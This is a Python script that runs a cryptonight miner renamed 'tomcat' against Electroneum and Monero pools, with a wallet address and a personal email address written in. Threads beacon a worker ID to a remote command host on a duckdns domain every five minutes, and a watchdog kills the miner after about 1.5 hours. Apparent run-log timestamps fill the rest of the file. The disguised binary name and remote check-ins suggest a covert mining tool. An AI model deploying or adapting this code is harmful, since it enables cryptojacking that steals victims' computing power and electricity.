import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:29:01.846742
#2018-02-17 17:16:05.916754
#2018-02-17 19:03:04.629117
#2018-02-17 20:51:07.813234
#2018-02-17 22:38:06.461372
#2018-02-18 00:22:03.744429
#2018-02-18 02:12:07.648798
#2018-02-18 03:59:01.436310
#2018-02-18 05:48:01.295788
#2018-02-18 07:38:01.635866
#2018-02-18 09:24:05.331600
#2018-02-18 11:10:08.565141
#2018-02-18 12:57:01.851473
#2018-02-18 14:44:06.911808
#2018-02-18 16:32:04.614301
#2018-02-18 18:21:01.623604
#2018-02-18 20:06:04.193467
#2018-02-18 21:52:06.176593
#2018-02-18 23:41:07.912531
#2018-02-19 01:27:05.152575
#2018-02-19 03:15:08.071639
#2018-02-19 05:01:07.688485
#2018-02-19 06:45:06.148960
#2018-02-19 08:36:04.341662
#2018-02-19 10:25:05.077718
#2018-02-19 12:13:04.606169
#2018-02-19 14:00:02.987185
#2018-02-19 15:48:09.669496
#2018-02-19 17:36:02.139254
#2018-02-19 19:23:06.366034
#2018-02-19 21:09:06.594659
#2018-02-19 22:57:05.687084
#2018-02-20 00:40:04.692670
#2018-02-20 02:28:05.855293
#2018-02-20 04:18:06.411753
#2018-02-20 06:02:07.823040
#2018-02-20 07:47:04.476690
#2018-02-20 09:32:06.045805
#2018-02-20 11:14:07.687190
#2018-02-20 13:02:06.347001
#2018-02-20 14:45:11.862729
#2018-02-20 16:32:10.782053
#2018-02-20 18:19:02.072456
#2018-02-20 20:09:01.774012
#2018-02-20 21:55:08.899144
#2018-02-20 23:37:07.371098
#2018-02-21 01:23:04.125401
#2018-02-21 03:11:04.057442
#2018-02-21 04:58:05.399498
#2018-02-21 06:46:07.636105
#2018-02-21 08:33:03.270798
#2018-02-21 10:19:01.390113
#2018-02-21 12:06:08.522746
#2018-02-21 13:56:03.048334
#2018-02-21 15:42:05.075105
#2018-02-21 17:35:05.666362
#2018-02-21 19:21:09.509199
#2018-02-21 21:11:05.884668
#2018-02-21 22:59:04.482593
#2018-02-22 00:46:05.439987
#2018-02-22 02:33:06.991186
#2018-02-22 04:19:05.830632
#2018-02-22 06:06:03.690818
#2018-02-22 07:51:01.403602
#2018-02-22 09:39:03.133482
#2018-02-22 11:24:02.148615
#2018-02-22 13:09:07.127572
#2018-02-22 14:58:04.817731
#2018-02-22 16:44:01.662933
#2018-02-22 18:29:05.334690
#2018-02-22 20:22:03.542932
#2018-02-22 22:10:03.992667
#2018-02-22 23:56:06.850576
#2018-02-23 01:44:01.326524
#2018-02-23 03:33:04.483946
#2018-02-23 05:19:03.754040
#2018-02-23 07:06:04.139333
#2018-02-23 08:57:07.870759
#2018-02-23 11:03:05.813889
#2018-02-23 12:57:04.201222
#2018-02-23 14:41:11.200225
#2018-02-23 16:30:09.101373
#2018-02-23 18:17:09.722897
#2018-02-23 20:03:06.588426
#2018-02-23 21:46:08.354066
#2018-02-23 23:40:06.092848
#2018-02-24 01:31:06.553085
#2018-02-24 03:20:06.889528
#2018-02-24 05:06:01.722308
#2018-02-24 06:54:07.104058
#2018-02-24 08:45:09.179636
#2018-02-24 10:40:08.211812
#2018-02-24 12:31:04.360092
#2018-02-24 14:21:01.937175
#2018-02-24 16:08:07.816144
#2018-02-24 18:00:09.471059
#2018-02-24 19:49:04.441557
#2018-02-24 21:33:06.552493
#2018-02-25 00:21:01.656937
#2018-02-25 03:28:06.210648
#2018-02-25 07:14:07.601779